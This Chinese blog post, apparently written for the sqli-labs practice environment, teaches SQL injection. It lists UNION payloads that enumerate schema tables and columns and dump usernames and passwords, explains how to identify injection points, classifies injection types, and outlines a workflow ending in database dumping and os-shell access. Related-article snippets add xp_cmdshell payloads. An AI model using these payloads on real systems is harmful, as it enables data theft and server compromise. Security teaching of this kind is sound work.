sql 注入的基本语句 种类 分类 流程

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量199 收藏
点赞数
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44286136/article/details/110088930
版权

sql注入是什么?
SQL注入攻击是利用网站程序漏洞,通过提交恶意构造的SQL语句,以达到窃 取、修改、破坏数据库为目的的攻击。
可以用来注入的地址,比如说某个请求会发送某个参数,而这个参数在后台用于作为数据库查询的拼接字段,且未完全过滤,那么这个点就有可能是一个注入点

基本语句

order by 4--+
判断有多少列
union select 1,2,3--+
判断数据显示点
union select 1,user(),database()--+
­显示出登录用户和数据库名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+
查看数据库有哪些表
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'--+
查看对应表有哪些列
union select 1,2,group_concat(username,'~'password) from users--+
查看账号密码信息

注入点类型来分类

  1. 数字型注入点
    当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
    1)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * from
    table where id=1’这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常
    2)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * from
    table where id=1’这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;
    3)加and 1=2,URL:http://xxx.xx:xxxx/new_list.php?id=1 and 1=2
    对应的sql:select * from table where id=1 and 1=2
    语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异
    如果满足以上三点,则可以判断该URL存在数字型注入。
  2. 字符型注入点
    当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
    例如数字型语句:select * from table where id=1 则字符型:select * from table where name=‘root’
    因此,通过闭合单引号可以成功执行语句:组合出来的sql注入语句为:select * from table where name=‘root’ and 1=1 ’ ’
    测试步骤:
    1)加单引号:select * from table where name=’admin’’
    由于加单引号后变成三个单引号,则无法执行,程序会报错;
    2)加 ’and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;
    Mysql 有三种常用注释符:
    – 注意,这种注释符后边有一个空格
    通过#进行注释
    /* */ 注释掉符号内的内容
    因此,构造语句为:select * from table where name =’admin’ and 1=1—’ 可成功执行返回结果正确;
    3) 加and 1=2— 此时sql语句为:select * from table where name=’admin’ and 1=2 –’则会报错
    如果满足以上三点,可以判断该url为字符型注入。
  3. 搜索型注入点
    %xxx%

数据提交的方式来分类

  1. GET 注入
    Get注入可以直接在url修改参数,提交数据的方式是 GET 比如有这样的一个Url 地址链接http://xxx.xx:xxxx/new_list.php?id=1 id就是注入点
  2. POST 注入
    Post注入要在输入框(请求正文)中修改参数 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
  3. Cookie 注入
    HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。
  4. HTTP 头部注入
    注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话,Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候,Cookie 是头部的一个字段。

执行效果来分类

  1. 基于布尔的盲注 可以根据返回页面判断条件真假的注入
  2. 基于时间的盲注 不能根据页面返回内容判断任何信息,攻击者通过注入延时语句(比如sleep )强制数据库延时一种长的时间,用于判断某条判断语句是TRUE还是FALSE,从而间接地猜测数据库中的数据。
  3. 基于报错注入 页面会返回错误信息,或者把注入的语句的结果直接返回在页面中
  4. 联合查询注入 可以使用union的情况下的注入。
  5. 堆查询注入 可以同时执行多条语句的执行时的注入
  6. 宽字节注入 利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入
  7. base64注入 注入字符经过base64编码后注入
    等等
    Get注入可以直接在url修改参数 Post注入要在输入框(请求正文)中修改参数

sql注入流程:

获取数据库数据库,提权
1.判断是否有sql注入漏洞,有则判断注入点类型
2.判断操作系统,数据库和web应用的类型
3.获取数据库信息,包括管理员信息及拖库
4.加密信息破解,sqlmap 破解
5.提升权限,获得sql-shell,os-shell,登录后台

营长s
关注
专栏目录
sql注入类型汇总
糖小喵
04-15 561
原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查...
SQL注入漏洞-01】SQL注入漏洞原理及分类
cc
02-01 7584
结构化查询语言(Structured Query Language,缩写︰SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。sql注入在安全问题中排行第一。
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 常用Sql注入语句 常用Sql注入语句
sql注入语句大全
weixin_34239169的博客
03-31 337
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1580
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL Injection with MySQL
11-11 1448
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
SQL注入语句 (很全)
02-02 701
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(...
SQL注入语句
qq_44656678的博客
09-07 308
对于SQL语句注入来说 最重要的是利用其系统已存在的一个information.Schema 其中schemata是用来查询库名称 Tables用来查询表名称 Columns用来查询列名称 Order by语句用来判断当前库的列数 Select用来查询库中的信息 关于SQL注入的相关流程 1.首先判断注入语句变量的闭合类型,例如?Id=1’或者?Id=$id或者id=1”等等闭合类型,保证输入以后...
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型注入 字符串类型注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
sql注入详解
m0_73109590的博客
08-03 1007
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
web安全day49:SQL注入原理、危害、分类,动手写MYSQL基本操作命令
小梁的博客
01-18 2244
目录 漏*洞原理 注入点可能存在的位置 漏*洞危害 注入方式分类 注入点的判断 MYSQL数据库基本操作命令 查看数据表 mysql常用函数与参数 逻辑运算 注入流程 结构化查询语言(structured query language,SQL),是一种用于数据库中的标准数据查询语言。具有明显的层次结构,包括了库名、表名、字段名、字段内容。 SQL注入SQL injection)是一种常见的Web安全漏*洞,公鸡者利用这个漏*洞,可以访问或者修改数据,或者利用潜在的数据库漏*洞进
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2465
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
SQL 语言基础
weixin_30596023的博客
11-23 128
1.4.SQL语言正如大多数现代的关系语言一样,SQL是基于记录关系微积分(TRC)的。结果是每个可以用记录关系微积分(TRC)表示的查询(相等地,或者是关系演算),同样也可以用SQL表示。不过,还有一些超出关系演算或者微积分的能力。下面是一个SQL提供的并非关系演算或者关系微积分的内容的一个列表:插入,删除或者更改数据的命令。算术能力:在SQL里,我们可以和比较...
SQL注入分类
Golderant的博客
09-11 2462
1.什么是sql注入2.为什么会有sql注入3.哪里可能存在sql注入4.sql注入分类 1.根据注入语法 Boolean-based blind SQL injection Error-based SQL injection UNION query SQL injection Stacked queries SQL
php mysql sql注入语句_php mysql SQL注入语句构造
weixin_34069265的博客
01-21 155
由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。声明:文章所有提到的“漏洞”,都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。二.“漏洞”分析:1.admin/login.p...
SQL注入:终止式绕过手法详解及防范
最后,文档概述了一个培训提纲,涵盖了SQL注入的全面理解和防御措施,包括但不限于SQL注入的背景、原理、分类以及渗透测试和防御框架的学习。本文提供了一个全面的指南,帮助读者深入理解SQL注入的复杂性,并学会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值